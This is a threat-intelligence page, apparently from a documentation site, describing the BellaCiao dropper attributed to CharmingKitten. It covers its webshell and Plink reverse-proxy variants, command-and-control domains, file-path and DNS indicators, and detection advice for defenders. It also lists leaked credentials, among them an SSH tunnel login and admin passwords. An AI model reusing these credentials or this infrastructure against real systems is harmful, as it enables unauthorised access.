Skip to main content

BellaCiao Malware Overview

BellaCiao is a sophisticated .NET-based dropper malware developed and deployed by CharmingKitten (IRGC-IO Counterintelligence Division, Department 40). The malware was first publicly analyzed by BitDefender and subsequently exposed through the release of its complete source code in Episode 3.
This analysis is based on the actual source code leaked from CharmingKitten’s internal network, providing unprecedented insight into Iranian APT malware development.

Overview

BellaCiao serves as a dropper that enables persistent access to compromised systems, primarily targeting Microsoft Exchange servers and IIS web servers. The malware comes in two distinct variants, each with different deployment mechanisms and capabilities.

Variant 1

C# webshell dropper with file upload, download, and command execution

Variant 2

PowerShell script with Plink reverse proxy and customized webserver

Malware Characteristics

Platform and Language

  • Primary Language: .NET C# (Variant 1), PowerShell (Variant 2)
  • Target Systems: Microsoft Windows Server (IIS, Exchange)
  • Persistence Mechanism: Windows Service, scheduled tasks
  • Network Communication: DNS-based C2, HTTP webserver

Attribution

BellaCiao has been definitively attributed to CharmingKitten through:
  • Complete source code recovery from internal networks
  • Infrastructure overlap with known CharmingKitten operations
  • Personnel connections documented in Episode 4
  • Correlation with publicly analyzed samples by BitDefender
The infrastructure domains and credentials exposed in this documentation may still be active. Security teams should implement blocking measures immediately.

Variant Comparison

FeatureVariant 1 (C# Dropper)Variant 2 (PowerShell)
DeploymentWindows ServicePowerShell script
C2 MethodDNS beaconingPlink reverse proxy
WebshellASP.NET (.aspx)PowerShell webserver
Target PathsIIS wwwroot, Exchange OWA pathsLocal HTTP listener
PersistenceService installationScheduled task
File OperationsUpload, download, executeFull webserver capabilities
Domainseposta.maill-support.com
eposta.mailupdate.info		twittsupport.com
msn-center.uk

Technical Architecture

Variant 1 Architecture

Variant 2 Architecture

Known Attacks

BellaCiao has been used in confirmed attacks against:
Attack Date: 2022-2024Details:
  • BellaCiao Variant 1 deployed to Exchange server
  • Webshell placed at Exchange OWA path
  • DNS beaconing to eposta.maill-support.com
  • Full network compromise with lateral movement
  • Credentials: Admin1@MFA, pfsenselondra@MFA
See Episode 3 Intelligence for full attack details.
Attack Date: Documented in Episode 4Details:
Geographic Scope: Turkey, UAE, Saudi Arabia, Kuwait, JordanDetails:
  • Part of broader ProxyShell exploitation campaign
  • 200+ targets across region
  • BellaCiao used for post-exploitation persistence
  • See Operations Targets

External Analysis

BitDefender published a comprehensive technical analysis of BellaCiao malware:

BitDefender Analysis

“Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware” - Read the full BitDefender report
The BitDefender analysis confirms:
  • Attribution to Iranian threat actors
  • Technical characteristics match leaked source code
  • Deployment patterns consistent with CharmingKitten operations
  • Infrastructure overlap with other IRGC-IO tools

Command and Control Infrastructure

Primary Domains (Variant 1)

  • eposta.maill-support.com - Primary C2 domain
  • eposta.mailupdate.info - Backup C2 domain

Secondary Domains (Variant 2)

  • twittsupport.com - Primary SSH tunnel endpoint
  • msn-center.uk - Backup SSH tunnel endpoint
See Infrastructure Domains for complete analysis.

Indicators of Compromise (IoCs)

File Paths

C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe

Service Names

  • MicrosoftAgentServices - Windows Service name for Variant 1

DNS Patterns

[A-Z]{2}[a-z]{3}EXH.eposta.maill-support.com
[A-Z]{2}[a-z]{3}EXH.eposta.mailupdate.info

Network Indicators

  • Local webserver on 127.0.0.1:49450 (Variant 2)
  • SSH tunnel credentials: -l Israel -pw Israel@123!

Detection Recommendations

1

Monitor DNS queries

Alert on DNS queries to *.eposta.maill-support.com, *.eposta.mailupdate.info, twittsupport.com, and msn-center.uk
2

Scan web paths

Search for unexpected ASPX files in IIS wwwroot and Exchange OWA authentication paths
3

Check for services

Identify suspicious Windows services named MicrosoftAgentServices or similar
4

Monitor process execution

Alert on plink.exe execution with tunnel parameters, especially listening on localhost ports

Variant 1 Analysis

Deep dive into C# webshell dropper

Variant 2 Analysis

PowerShell reverse proxy analysis

Technical Analysis

Detailed technical analysis and malware behavior

Episode 3

Episode 3 source code release

Build docs developers (and LLMs) love

Get started for freeTalk to us